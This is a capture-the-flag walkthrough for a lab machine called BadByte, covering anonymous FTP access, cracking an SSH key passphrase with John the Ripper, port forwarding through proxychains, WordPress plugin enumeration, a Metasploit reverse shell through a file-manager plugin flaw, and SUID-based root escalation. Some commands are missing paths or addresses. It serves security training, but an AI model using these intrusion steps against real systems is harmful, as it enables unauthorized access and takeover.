
Writeups for the ROOMS available at

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Infiltrate BadByte and help us to take over root.

[Task 2] Reconnaissance

In this task:

If you are unsure how to tackle this, I recommend checking out the Nmap Tutorials by Hack Hunt.

Nmap Scan

These questions can be answered using the above results.

[Task 3] Foothold

Hmm, crack the passpharse, but where is it? I think the creator forgot to give us the link?!

Oops! There is a FTP port open, lets check that. Connect to the machine using ftp <IP> 30024 with credentials anonymous:anonymous

FTP Connection

Check what files do we have here!

File Listing

Ohhh! the creator was talking about this note.txt. There is one more file, seems like private_key for ssh connection. SWEET!

Use get command to get those two files. Syntax is get <source> <destination>.

Get Files

Now that we have the file, let’s first check the content of the note.txt

Content of NOTE

Seems like we have a user errorcauser. Well thanks for forgetting your password and keeping a copy here.

As the port 22 is open. Let’s connect via ssh.


Seems like, it needs a password :cry:

JohnTheRipper to RESCUE.

  1. Convert id_rsa into hash using -> python3 /usr/share/john/ id_rsa > hash
  2. john hash -w=rockyou.txt

Crack Password

Seems like we have a password. Let’s connect.

What username do we find during the enumeration process?


What is the passphrase for the RSA private key?

Result from JohnTheRipper.

[Task 4] Port Forwarding

First add the socks4 9050, if it is not already in /etc/proxychains.conf

Dynamic Port Forwarding can be setup using : ssh -D 9050 errorcauser@<IP> -i id_rsa

Fireup another terminal and scan the machine using nmap. This can be achieved using: sudo proxychains nmap -sT -Pn localhost.

Scan Result

These questions can be answered using above scan result.

Local Port forwarding can be done using: sudo ssh -i id_rsa -N -L 8080: errorcauser@<IP>

[TASK 5] Web Exploitation

Let’s go to localhost:8080. It a good looking website.


To know about CMS and what it is, check this Reference.

What CMS is running on the machine? First Post

Check the first post and its seems like its WordPress.

To get the plugins, I use gobuster to enumerate for valid plugins. In wordpress, plugins are in directory /wp-content/plugins/ and there is a very good plugins wordlist -> usr/share/metasploit-framework/data/wordlists/wp-plugins.txt

CMD -> gobuster dir -u -w usr/share/metasploit-framework/data/wordlists/wp-plugins.txt

GoBuster Results

We have three plugins:

You can get the version by http://localhost:8080/wp-content/plugins/<plugin_name>/readme.txt

To know more about the enumeration for WordPress, I used this Reference.

What is the CVE number for directory traversal vulnerability?

Go to CVE Mitre website and search for wordpress duplicator. You will get the CVE number. Make sure to check the HINTS for this one.

What is the CVE number for remote code execution vulnerability?

Search for wordpress wp-file in searchsploit

Search Results

There is one which can be use for RCE.

Check the file using: cat /usr/share/exploit-db/exploits/php/webapps/49178.bash | head

CVE Results

There is a metasploit module for the exploit. You can use it to get the reverse shell. If you are feeling lucky you can follow any POC( Proof of Concept).

Start Metasploit using msfconsole and search using search wordpress wp-file.


Type use 0.

Set all the options like RHOSTS, RPORT and LHOST.


Type, run and BAAM got the meterpreter connection.

Got Access

What is the name of user that was running CMS?

Go to /home using cd /home and do ls to get the users.


What is the user flag?

Go to the user’s directory and type cat user.txt.

User Flag

[Task 6] Privilege Escalation


There is .bash_history file. Download it using download .bash_histroy and check the file. It didn’t worked for me.

So I looked around in /var/log/ directory and found bash.log. Read the file using cat bash_log


You will get the old password.

What is the user’s new password?

Read the description properly and you can guess the new password. I believe in you :grin:

Now we have the password and username. We can connect using ssh


For basic enumeration start with sudo -l command or find SUIDs.

Or you can use Send the file using scp


Run the file by ./ This will do all the work for you.

For now I will do it manually, to find SUIDs use find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;


Go to GTFOBins Website and search the commands.

This can be done using mount. MOUST SUID

Or pkexec


Or simple sucommand

Root User

What is the root flag?

You know what to do :stuck_out_tongue_winking_eye:

Root Flag